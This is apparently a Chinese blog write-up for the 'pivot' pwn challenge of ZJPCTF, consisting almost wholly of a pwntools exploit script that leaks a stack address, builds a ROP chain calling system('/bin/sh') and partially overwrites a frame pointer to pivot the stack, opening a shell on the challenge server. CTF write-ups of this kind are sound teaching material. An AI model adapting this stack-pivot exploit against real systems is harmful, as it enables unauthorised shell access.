看板娘加载中
48 字
1 分钟
pivot
2026-06-14
ZJPCTF
ZJPCTF
ZJPCTF
/
Pwn
/
pivot

附件:pivot-wp.docx

shot 1 shot 2 shot 3 shot 4

exp:

from pwn import *


context(os="linux",arch="amd64",log_level="debug")
elf=ELF("./pwn",checksec=False)
pop_rdi=0x4011F1
ret=0x4011F6
system=elf.plt["system"]


io=remote("nc1.ctfplus.cn",23968)
io.recvuntil(b"Desk stamp: ")
io.recvline()
io.recvuntil(b"Claim check: ")
buf=int(io.recvline().strip(),16)
low=buf&0xff
if low<=0x8f:
    off=0x48
elif low>=0xb8:
    off=0x100-low


payload=flat(
    b"/bin/sh\x00".ljust(off,b"A"),
    0,
    pop_rdi,
    buf,
    ret,
    system,
    word_size=64,
).ljust(0x70,b"B")


io.send(payload)
io.recvuntil(b"night clerk:\n")
io.send(b"D"*0x20+p8((buf+off)&0xff))
io.interactive()
pivot
https://alf-ovo.cn/posts/pivot/
作者
AlF
发布于
2026-06-14
许可协议
CC BY-NC-SA 4.0
ctfshow Format String Vulnerability pwn91
值班乌鸦已值守 正在校准风向...
羽毛落点累计 正在清点脚印...
© 2026 AlF. 保留所有权利 / RSS / 站点地图
Astro & Fuwari 驱动

如有侵权,联系 3483179408@qq.com ,看到会立刻删除。